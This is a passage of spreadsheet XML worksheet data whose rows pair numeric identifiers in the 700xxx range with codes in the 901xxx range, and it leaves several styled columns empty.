    <row r="2277" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2277" s="5">
        <v>700512</v>
      </c>
      <c r="B2277" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2277" s="5"/>
      <c r="E2277" s="3"/>
      <c r="F2277" s="1"/>
      <c r="H2277" s="1"/>
    </row>
    <row r="2278" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2278" s="5">
        <v>700512</v>
      </c>
      <c r="B2278" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2278" s="5"/>
      <c r="E2278" s="3"/>
      <c r="F2278" s="1"/>
      <c r="H2278" s="1"/>
    </row>
    <row r="2279" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2279" s="5">
        <v>700512</v>
      </c>
      <c r="B2279" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D2279" s="5"/>
      <c r="E2279" s="3"/>
      <c r="F2279" s="1"/>
      <c r="H2279" s="1"/>
    </row>
    <row r="2280" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2280" s="5">
        <v>700512</v>
      </c>
      <c r="B2280" s="3">
        <v>901005</v>
      </c>
      <c r="D2280" s="5"/>
      <c r="E2280" s="3"/>
      <c r="F2280" s="1"/>
      <c r="H2280" s="1"/>
    </row>
    <row r="2281" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2281" s="5">
        <v>700512</v>
      </c>
      <c r="B2281" s="3">
        <v>901140</v>
      </c>
      <c r="D2281" s="5"/>
      <c r="E2281" s="3"/>
      <c r="F2281" s="1"/>
      <c r="H2281" s="1"/>
    </row>
    <row r="2282" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2282" s="5">
        <v>700512</v>
      </c>
      <c r="B2282" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D2282" s="5"/>
      <c r="E2282" s="3"/>
      <c r="F2282" s="1"/>
      <c r="H2282" s="1"/>
    </row>
    <row r="2283" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2283" s="5">
        <v>700512</v>
      </c>
      <c r="B2283" s="3">
        <v>901008</v>
      </c>
      <c r="D2283" s="5"/>
      <c r="E2283" s="3"/>
      <c r="F2283" s="1"/>
      <c r="H2283" s="1"/>
    </row>
    <row r="2284" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2284" s="5">
        <v>700512</v>
      </c>
      <c r="B2284" s="3">
        <v>901083</v>
      </c>
      <c r="D2284" s="5"/>
      <c r="E2284" s="3"/>
      <c r="F2284" s="1"/>
      <c r="H2284" s="1"/>
    </row>
    <row r="2285" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2285" s="5">
        <v>700512</v>
      </c>
      <c r="B2285" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D2285" s="5"/>
      <c r="E2285" s="3"/>
      <c r="F2285" s="1"/>
      <c r="H2285" s="1"/>
    </row>
    <row r="2286" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2286" s="5">
        <v>700512</v>
      </c>
      <c r="B2286" s="3">
        <v>901036</v>
      </c>
      <c r="D2286" s="5"/>
      <c r="E2286" s="3"/>
      <c r="F2286" s="1"/>
      <c r="H2286" s="1"/>
    </row>
    <row r="2287" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2287" s="5">
        <v>700512</v>
      </c>
      <c r="B2287" s="3">
        <v>901106</v>
      </c>
      <c r="D2287" s="5"/>
      <c r="E2287" s="3"/>
      <c r="F2287" s="1"/>
      <c r="H2287" s="1"/>
    </row>
    <row r="2288" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2288" s="5">
        <v>700512</v>
      </c>
      <c r="B2288" s="3">
        <v>901027</v>
      </c>
      <c r="D2288" s="5"/>
      <c r="E2288" s="3"/>
      <c r="F2288" s="1"/>
      <c r="H2288" s="1"/>
    </row>
    <row r="2289" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2289" s="5">
        <v>700512</v>
      </c>
      <c r="B2289" s="3">
        <v>901027.00100000005</v>
      </c>
      <c r="D2289" s="5"/>
      <c r="E2289" s="3"/>
      <c r="F2289" s="1"/>
      <c r="H2289" s="1"/>
    </row>
    <row r="2290" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2290" s="5">
        <v>700512</v>
      </c>
      <c r="B2290" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D2290" s="5"/>
      <c r="E2290" s="3"/>
      <c r="F2290" s="1"/>
      <c r="H2290" s="1"/>
    </row>
    <row r="2291" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2291" s="5">
        <v>700512</v>
      </c>
      <c r="B2291" s="3">
        <v>901057</v>
      </c>
      <c r="D2291" s="5"/>
      <c r="E2291" s="3"/>
      <c r="F2291" s="1"/>
      <c r="H2291" s="1"/>
    </row>
    <row r="2292" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2292" s="5">
        <v>700512</v>
      </c>
      <c r="B2292" s="3">
        <v>901090.00100000005</v>
      </c>
      <c r="D2292" s="5"/>
      <c r="E2292" s="3"/>
      <c r="F2292" s="1"/>
      <c r="H2292" s="1"/>
    </row>
    <row r="2293" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2293" s="5">
        <v>700512</v>
      </c>
      <c r="B2293" s="3">
        <v>901012</v>
      </c>
      <c r="D2293" s="5"/>
      <c r="E2293" s="3"/>
      <c r="F2293" s="1"/>
      <c r="H2293" s="1"/>
    </row>
    <row r="2294" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2294" s="5">
        <v>700512</v>
      </c>
      <c r="B2294" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D2294" s="5"/>
      <c r="E2294" s="3"/>
      <c r="F2294" s="1"/>
      <c r="H2294" s="1"/>
    </row>
    <row r="2295" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2295" s="5">
        <v>700512</v>
      </c>
      <c r="B2295" s="3">
        <v>901082</v>
      </c>
      <c r="D2295" s="5"/>
      <c r="E2295" s="3"/>
      <c r="F2295" s="1"/>
      <c r="H2295" s="1"/>
    </row>
    <row r="2296" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2296" s="5">
        <v>700512</v>
      </c>
      <c r="B2296" s="3">
        <v>901016</v>
      </c>
      <c r="D2296" s="5"/>
      <c r="E2296" s="3"/>
      <c r="F2296" s="1"/>
      <c r="H2296" s="1"/>
    </row>
    <row r="2297" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2297" s="5">
        <v>700512</v>
      </c>
      <c r="B2297" s="3">
        <v>901497.00300000003</v>
      </c>
      <c r="D2297" s="5"/>
      <c r="E2297" s="3"/>
      <c r="F2297" s="1"/>
      <c r="H2297" s="1"/>
    </row>
    <row r="2298" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2298" s="5">
        <v>700171</v>
      </c>
      <c r="B2298" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2298" s="5"/>
      <c r="E2298" s="3"/>
      <c r="F2298" s="1"/>
      <c r="H2298" s="1"/>
    </row>
    <row r="2299" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2299" s="5">
        <v>700171</v>
      </c>
      <c r="B2299" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D2299" s="5"/>
      <c r="E2299" s="3"/>
      <c r="F2299" s="1"/>
      <c r="H2299" s="1"/>
    </row>
    <row r="2300" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2300" s="5">
        <v>700171</v>
      </c>
      <c r="B2300" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D2300" s="5"/>
      <c r="E2300" s="3"/>
      <c r="F2300" s="1"/>
      <c r="H2300" s="1"/>
    </row>
    <row r="2301" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2301" s="5">
        <v>700171</v>
      </c>
      <c r="B2301" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D2301" s="5"/>
      <c r="E2301" s="3"/>
      <c r="F2301" s="1"/>
      <c r="H2301" s="1"/>
    </row>
    <row r="2302" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2302" s="5">
        <v>700171</v>
      </c>
      <c r="B2302" s="3">
        <v>901105</v>
      </c>
      <c r="D2302" s="5"/>
      <c r="E2302" s="3"/>
      <c r="F2302" s="1"/>
      <c r="H2302" s="1"/>
    </row>
    <row r="2303" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2303" s="5">
        <v>700171</v>
      </c>
      <c r="B2303" s="3">
        <v>901036.005</v>
      </c>
      <c r="D2303" s="5"/>
      <c r="E2303" s="3"/>
      <c r="F2303" s="1"/>
      <c r="H2303" s="1"/>
    </row>
    <row r="2304" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2304" s="5">
        <v>700171</v>
      </c>
      <c r="B2304" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D2304" s="5"/>
      <c r="E2304" s="3"/>
      <c r="F2304" s="1"/>
      <c r="H2304" s="1"/>
    </row>
    <row r="2305" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2305" s="5">
        <v>700171</v>
      </c>
      <c r="B2305" s="3">
        <v>901082</v>
      </c>
      <c r="D2305" s="5"/>
      <c r="E2305" s="3"/>
      <c r="F2305" s="1"/>
      <c r="H2305" s="1"/>
    </row>
    <row r="2306" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2306" s="5">
        <v>700171</v>
      </c>
      <c r="B2306" s="3">
        <v>901016</v>
      </c>
      <c r="D2306" s="5"/>
      <c r="E2306" s="3"/>
      <c r="F2306" s="1"/>
      <c r="H2306" s="1"/>
    </row>
    <row r="2307" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2307" s="5">
        <v>700171</v>
      </c>
      <c r="B2307" s="3">
        <v>901033</v>
      </c>
      <c r="D2307" s="5"/>
      <c r="E2307" s="3"/>
      <c r="F2307" s="1"/>
      <c r="H2307" s="1"/>
    </row>
    <row r="2308" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2308" s="5">
        <v>700267</v>
      </c>
      <c r="B2308" s="3">
        <v>901071</v>
      </c>
      <c r="D2308" s="5"/>
      <c r="E2308" s="3"/>
      <c r="F2308" s="1"/>
      <c r="H2308" s="1"/>
    </row>
    <row r="2309" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2309" s="5">
        <v>700267</v>
      </c>
      <c r="B2309" s="3">
        <v>901560</v>
      </c>
      <c r="D2309" s="5"/>
      <c r="E2309" s="3"/>
      <c r="F2309" s="1"/>
      <c r="H2309" s="1"/>
    </row>
    <row r="2310" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2310" s="5">
        <v>700267</v>
      </c>
      <c r="B2310" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2310" s="5"/>
      <c r="E2310" s="3"/>
      <c r="F2310" s="1"/>
      <c r="H2310" s="1"/>
    </row>
    <row r="2311" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2311" s="5">
        <v>700267</v>
      </c>
      <c r="B2311" s="3">
        <v>901547.00899999996</v>
      </c>
      <c r="D2311" s="5"/>
      <c r="E2311" s="3"/>
      <c r="F2311" s="1"/>
      <c r="H2311" s="1"/>
    </row>
    <row r="2312" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2312" s="5">
        <v>700267</v>
      </c>
      <c r="B2312" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D2312" s="5"/>
      <c r="E2312" s="3"/>
      <c r="F2312" s="1"/>
      <c r="H2312" s="1"/>
    </row>
    <row r="2313" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2313" s="5">
        <v>700267</v>
      </c>
      <c r="B2313" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D2313" s="5"/>
      <c r="E2313" s="3"/>
      <c r="F2313" s="1"/>
      <c r="H2313" s="1"/>
    </row>
    <row r="2314" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2314" s="5">
        <v>700267</v>
      </c>
      <c r="B2314" s="3">
        <v>901105</v>
      </c>
      <c r="D2314" s="5"/>
      <c r="E2314" s="3"/>
      <c r="F2314" s="1"/>
      <c r="H2314" s="1"/>
    </row>
    <row r="2315" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2315" s="5">
        <v>700267</v>
      </c>
      <c r="B2315" s="3">
        <v>901112</v>
      </c>
      <c r="D2315" s="5"/>
      <c r="E2315" s="3"/>
      <c r="F2315" s="1"/>
      <c r="H2315" s="1"/>
    </row>
    <row r="2316" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2316" s="5">
        <v>700267</v>
      </c>
      <c r="B2316" s="3">
        <v>901027</v>
      </c>
      <c r="D2316" s="5"/>
      <c r="E2316" s="3"/>
      <c r="F2316" s="1"/>
      <c r="H2316" s="1"/>
    </row>
    <row r="2317" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2317" s="5">
        <v>700267</v>
      </c>
      <c r="B2317" s="3">
        <v>901057</v>
      </c>
      <c r="D2317" s="5"/>
      <c r="E2317" s="3"/>
      <c r="F2317" s="1"/>
      <c r="H2317" s="1"/>
    </row>
    <row r="2318" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2318" s="5">
        <v>700267</v>
      </c>
      <c r="B2318" s="3">
        <v>901012</v>
      </c>
      <c r="D2318" s="5"/>
      <c r="E2318" s="3"/>
      <c r="F2318" s="1"/>
      <c r="H2318" s="1"/>
    </row>
    <row r="2319" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2319" s="5">
        <v>700267</v>
      </c>
      <c r="B2319" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D2319" s="5"/>
      <c r="E2319" s="3"/>
      <c r="F2319" s="1"/>
      <c r="H2319" s="1"/>
    </row>
    <row r="2320" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2320" s="5">
        <v>700267</v>
      </c>
      <c r="B2320" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D2320" s="5"/>
      <c r="E2320" s="3"/>
      <c r="F2320" s="1"/>
      <c r="H2320" s="1"/>
    </row>
    <row r="2321" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2321" s="5">
        <v>700267</v>
      </c>
      <c r="B2321" s="3">
        <v>901082</v>
      </c>
      <c r="D2321" s="5"/>
      <c r="E2321" s="3"/>
      <c r="F2321" s="1"/>
      <c r="H2321" s="1"/>
    </row>
    <row r="2322" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2322" s="5">
        <v>700267</v>
      </c>
      <c r="B2322" s="3">
        <v>901016</v>
      </c>
      <c r="D2322" s="5"/>
      <c r="E2322" s="3"/>
      <c r="F2322" s="1"/>
      <c r="H2322" s="1"/>
    </row>
    <row r="2323" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2323" s="5">
        <v>700267</v>
      </c>
      <c r="B2323" s="3">
        <v>901033</v>
      </c>
      <c r="D2323" s="5"/>
      <c r="E2323" s="3"/>
      <c r="F2323" s="1"/>
      <c r="H2323" s="1"/>
    </row>
    <row r="2324" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2324" s="5">
        <v>700267</v>
      </c>
      <c r="B2324" s="3">
        <v>901124</v>
      </c>
      <c r="D2324" s="5"/>
      <c r="E2324" s="3"/>
      <c r="F2324" s="1"/>
      <c r="H2324" s="1"/>
    </row>
    <row r="2325" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2325" s="5">
        <v>700267</v>
      </c>
      <c r="B2325" s="3">
        <v>901047</v>
      </c>
      <c r="D2325" s="5"/>
      <c r="E2325" s="3"/>
      <c r="F2325" s="1"/>
      <c r="H2325" s="1"/>
    </row>
    <row r="2326" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2326" s="5">
        <v>700120</v>
      </c>
      <c r="B2326" s="3">
        <v>901003.00199999998</v>
      </c>
      <c r="D2326" s="5"/>
      <c r="E2326" s="3"/>
      <c r="F2326" s="1"/>
      <c r="H2326" s="1"/>
    </row>
    <row r="2327" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2327" s="5">
        <v>700355</v>
      </c>
      <c r="B2327" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2327" s="5"/>
      <c r="E2327" s="3"/>
      <c r="F2327" s="1"/>
      <c r="H2327" s="1"/>
    </row>
    <row r="2328" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2328" s="5">
        <v>700355</v>
      </c>
      <c r="B2328" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2328" s="5"/>
      <c r="E2328" s="3"/>
      <c r="F2328" s="1"/>
      <c r="H2328" s="1"/>
    </row>
    <row r="2329" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2329" s="5">
        <v>700355</v>
      </c>
      <c r="B2329" s="3">
        <v>901140</v>
      </c>
      <c r="D2329" s="5"/>
      <c r="E2329" s="3"/>
      <c r="F2329" s="1"/>
      <c r="H2329" s="1"/>
    </row>
    <row r="2330" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2330" s="5">
        <v>700355</v>
      </c>
      <c r="B2330" s="3">
        <v>901027</v>
      </c>
      <c r="D2330" s="5"/>
      <c r="E2330" s="3"/>
      <c r="F2330" s="1"/>
      <c r="H2330" s="1"/>
    </row>
    <row r="2331" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2331" s="5">
        <v>700355</v>
      </c>
      <c r="B2331" s="3">
        <v>901057</v>
      </c>
      <c r="D2331" s="5"/>
      <c r="E2331" s="3"/>
      <c r="F2331" s="1"/>
      <c r="H2331" s="1"/>
    </row>
    <row r="2332" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2332" s="5">
        <v>700355</v>
      </c>
      <c r="B2332" s="3">
        <v>901082</v>
      </c>
      <c r="D2332" s="5"/>
      <c r="E2332" s="3"/>
      <c r="F2332" s="1"/>
      <c r="H2332" s="1"/>
    </row>
    <row r="2333" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2333" s="5">
        <v>700182</v>
      </c>
      <c r="B2333" s="3">
        <v>901548.00199999998</v>
      </c>
      <c r="D2333" s="5"/>
      <c r="E2333" s="3"/>
      <c r="F2333" s="1"/>
      <c r="H2333" s="1"/>
    </row>
    <row r="2334" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2334" s="5">
        <v>700182</v>
      </c>
      <c r="B2334" s="3">
        <v>901134.00100000005</v>
      </c>
      <c r="D2334" s="5"/>
      <c r="E2334" s="3"/>
      <c r="F2334" s="1"/>
      <c r="H2334" s="1"/>
    </row>
    <row r="2335" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2335" s="5">
        <v>700182</v>
      </c>
      <c r="B2335" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2335" s="5"/>
      <c r="E2335" s="3"/>
      <c r="F2335" s="1"/>
      <c r="H2335" s="1"/>
    </row>
    <row r="2336" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2336" s="5">
        <v>700182</v>
      </c>
      <c r="B2336" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D2336" s="5"/>
      <c r="E2336" s="3"/>
      <c r="F2336" s="1"/>
      <c r="H2336" s="1"/>
    </row>
    <row r="2337" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2337" s="5">
        <v>700182</v>
      </c>
      <c r="B2337" s="3">
        <v>901140</v>
      </c>
      <c r="D2337" s="5"/>
      <c r="E2337" s="3"/>
      <c r="F2337" s="1"/>
      <c r="H2337" s="1"/>
    </row>
    <row r="2338" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2338" s="5">
        <v>700182</v>
      </c>
      <c r="B2338" s="3">
        <v>901083</v>
      </c>
      <c r="D2338" s="5"/>
      <c r="E2338" s="3"/>
      <c r="F2338" s="1"/>
      <c r="H2338" s="1"/>
    </row>
    <row r="2339" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2339" s="5">
        <v>700182</v>
      </c>
      <c r="B2339" s="3">
        <v>901574.00100000005</v>
      </c>
      <c r="D2339" s="5"/>
      <c r="E2339" s="3"/>
      <c r="F2339" s="1"/>
      <c r="H2339" s="1"/>
    </row>
    <row r="2340" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2340" s="5">
        <v>700182</v>
      </c>
      <c r="B2340" s="3">
        <v>901574.00199999998</v>
      </c>
      <c r="D2340" s="5"/>
      <c r="E2340" s="3"/>
      <c r="F2340" s="1"/>
      <c r="H2340" s="1"/>
    </row>
    <row r="2341" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2341" s="5">
        <v>700182</v>
      </c>
      <c r="B2341" s="3">
        <v>901070.00100000005</v>
      </c>
      <c r="D2341" s="5"/>
      <c r="E2341" s="3"/>
      <c r="F2341" s="1"/>
      <c r="H2341" s="1"/>
    </row>
    <row r="2342" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2342" s="5">
        <v>700182</v>
      </c>
      <c r="B2342" s="3">
        <v>901056.00399999996</v>
      </c>
      <c r="D2342" s="5"/>
      <c r="E2342" s="3"/>
      <c r="F2342" s="1"/>
      <c r="H2342" s="1"/>
    </row>
    <row r="2343" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2343" s="5">
        <v>700182</v>
      </c>
      <c r="B2343" s="3">
        <v>901036.005</v>
      </c>
      <c r="D2343" s="5"/>
      <c r="E2343" s="3"/>
      <c r="F2343" s="1"/>
      <c r="H2343" s="1"/>
    </row>
    <row r="2344" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2344" s="5">
        <v>700182</v>
      </c>
      <c r="B2344" s="3">
        <v>901027</v>
      </c>
      <c r="D2344" s="5"/>
      <c r="E2344" s="3"/>
      <c r="F2344" s="1"/>
      <c r="H2344" s="1"/>
    </row>
    <row r="2345" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2345" s="5">
        <v>700182</v>
      </c>
      <c r="B2345" s="3">
        <v>901027.00100000005</v>
      </c>
      <c r="D2345" s="5"/>
      <c r="E2345" s="3"/>
      <c r="F2345" s="1"/>
      <c r="H2345" s="1"/>
    </row>
    <row r="2346" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2346" s="5">
        <v>700182</v>
      </c>
      <c r="B2346" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D2346" s="5"/>
      <c r="E2346" s="3"/>
      <c r="F2346" s="1"/>
      <c r="H2346" s="1"/>
    </row>
    <row r="2347" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2347" s="5">
        <v>700182</v>
      </c>
      <c r="B2347" s="3">
        <v>901542.00300000003</v>
      </c>
      <c r="D2347" s="5"/>
      <c r="E2347" s="3"/>
      <c r="F2347" s="1"/>
      <c r="H2347" s="1"/>
    </row>
    <row r="2348" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2348" s="5">
        <v>700182</v>
      </c>
      <c r="B2348" s="3">
        <v>901057</v>
      </c>
      <c r="D2348" s="5"/>
      <c r="E2348" s="3"/>
      <c r="F2348" s="1"/>
      <c r="H2348" s="1"/>
    </row>
    <row r="2349" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2349" s="5">
        <v>700182</v>
      </c>
      <c r="B2349" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D2349" s="5"/>
      <c r="E2349" s="3"/>
      <c r="F2349" s="1"/>
      <c r="H2349" s="1"/>
    </row>
    <row r="2350" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2350" s="5">
        <v>700182</v>
      </c>
      <c r="B2350" s="3">
        <v>901012</v>
      </c>
      <c r="D2350" s="5"/>
      <c r="E2350" s="3"/>
      <c r="F2350" s="1"/>
      <c r="H2350" s="1"/>
    </row>
    <row r="2351" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2351" s="5">
        <v>700182</v>
      </c>
      <c r="B2351" s="3">
        <v>901113</v>
      </c>
      <c r="D2351" s="5"/>
      <c r="E2351" s="3"/>
      <c r="F2351" s="1"/>
      <c r="H2351" s="1"/>
    </row>
    <row r="2352" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2352" s="5">
        <v>700182</v>
      </c>
      <c r="B2352" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D2352" s="5"/>
      <c r="E2352" s="3"/>
      <c r="F2352" s="1"/>
      <c r="H2352" s="1"/>
    </row>
    <row r="2353" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2353" s="5">
        <v>700182</v>
      </c>
      <c r="B2353" s="3">
        <v>901082</v>
      </c>
      <c r="D2353" s="5"/>
      <c r="E2353" s="3"/>
      <c r="F2353" s="1"/>
      <c r="H2353" s="1"/>
    </row>
    <row r="2354" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2354" s="5">
        <v>700182</v>
      </c>
      <c r="B2354" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D2354" s="5"/>
      <c r="E2354" s="3"/>
      <c r="F2354" s="1"/>
      <c r="H2354" s="1"/>
    </row>
    <row r="2355" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2355" s="5">
        <v>700182</v>
      </c>
      <c r="B2355" s="3">
        <v>901433</v>
      </c>
      <c r="D2355" s="5"/>
      <c r="E2355" s="3"/>
      <c r="F2355" s="1"/>
      <c r="H2355" s="1"/>
    </row>
    <row r="2356" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2356" s="5">
        <v>700182</v>
      </c>
      <c r="B2356" s="3">
        <v>901429</v>
      </c>
      <c r="D2356" s="5"/>
      <c r="E2356" s="3"/>
      <c r="F2356" s="1"/>
      <c r="H2356" s="1"/>
    </row>
    <row r="2357" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2357" s="5">
        <v>700182</v>
      </c>
      <c r="B2357" s="3">
        <v>901412</v>
      </c>
      <c r="D2357" s="5"/>
      <c r="E2357" s="3"/>
      <c r="F2357" s="1"/>
      <c r="H2357" s="1"/>
    </row>
    <row r="2358" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2358" s="5">
        <v>700182</v>
      </c>
      <c r="B2358" s="3">
        <v>901436</v>
      </c>
      <c r="D2358" s="5"/>
      <c r="E2358" s="3"/>
      <c r="F2358" s="1"/>
      <c r="H2358" s="1"/>
    </row>
    <row r="2359" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2359" s="5">
        <v>700182</v>
      </c>
      <c r="B2359" s="3">
        <v>901404</v>
      </c>
      <c r="D2359" s="5"/>
      <c r="E2359" s="3"/>
      <c r="F2359" s="1"/>
      <c r="H2359" s="1"/>
    </row>
    <row r="2360" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2360" s="5">
        <v>700182</v>
      </c>
      <c r="B2360" s="3">
        <v>901430</v>
      </c>
      <c r="D2360" s="5"/>
      <c r="E2360" s="3"/>
      <c r="F2360" s="1"/>
      <c r="H2360" s="1"/>
    </row>
    <row r="2361" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2361" s="5">
        <v>700618</v>
      </c>
      <c r="B2361" s="3">
        <v>901059</v>
      </c>
      <c r="D2361" s="5"/>
      <c r="E2361" s="3"/>
      <c r="F2361" s="1"/>
      <c r="H2361" s="1"/>
    </row>
    <row r="2362" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2362" s="5">
        <v>700618</v>
      </c>
      <c r="B2362" s="3">
        <v>901486</v>
      </c>
      <c r="D2362" s="5"/>
      <c r="E2362" s="3"/>
      <c r="F2362" s="1"/>
      <c r="H2362" s="1"/>
    </row>
    <row r="2363" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2363" s="5">
        <v>700618</v>
      </c>
      <c r="B2363" s="3">
        <v>901140</v>
      </c>
      <c r="D2363" s="5"/>
      <c r="E2363" s="3"/>
      <c r="F2363" s="1"/>
      <c r="H2363" s="1"/>
    </row>
    <row r="2364" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2364" s="5">
        <v>700618</v>
      </c>
      <c r="B2364" s="3">
        <v>901083</v>
      </c>
      <c r="D2364" s="5"/>
      <c r="E2364" s="3"/>
      <c r="F2364" s="1"/>
      <c r="H2364" s="1"/>
    </row>
    <row r="2365" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2365" s="5">
        <v>700618</v>
      </c>
      <c r="B2365" s="3">
        <v>901490</v>
      </c>
      <c r="D2365" s="5"/>
      <c r="E2365" s="3"/>
      <c r="F2365" s="1"/>
      <c r="H2365" s="1"/>
    </row>
    <row r="2366" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2366" s="5">
        <v>700618</v>
      </c>
      <c r="B2366" s="3">
        <v>901135</v>
      </c>
      <c r="D2366" s="5"/>
      <c r="E2366" s="3"/>
      <c r="F2366" s="1"/>
      <c r="H2366" s="1"/>
    </row>
    <row r="2367" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2367" s="5">
        <v>700618</v>
      </c>
      <c r="B2367" s="3">
        <v>901027</v>
      </c>
      <c r="D2367" s="5"/>
      <c r="E2367" s="3"/>
      <c r="F2367" s="1"/>
      <c r="H2367" s="1"/>
    </row>
    <row r="2368" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2368" s="5">
        <v>700618</v>
      </c>
      <c r="B2368" s="3">
        <v>901047</v>
      </c>
      <c r="D2368" s="5"/>
      <c r="E2368" s="3"/>
      <c r="F2368" s="1"/>
      <c r="H2368" s="1"/>
    </row>
    <row r="2369" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2369" s="5">
        <v>700143</v>
      </c>
      <c r="B2369" s="3">
        <v>901123</v>
      </c>
      <c r="D2369" s="5"/>
      <c r="E2369" s="3"/>
      <c r="F2369" s="1"/>
      <c r="H2369" s="1"/>
    </row>
    <row r="2370" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2370" s="5">
        <v>700143</v>
      </c>
      <c r="B2370" s="3">
        <v>901547.00199999998</v>
      </c>
      <c r="D2370" s="5"/>
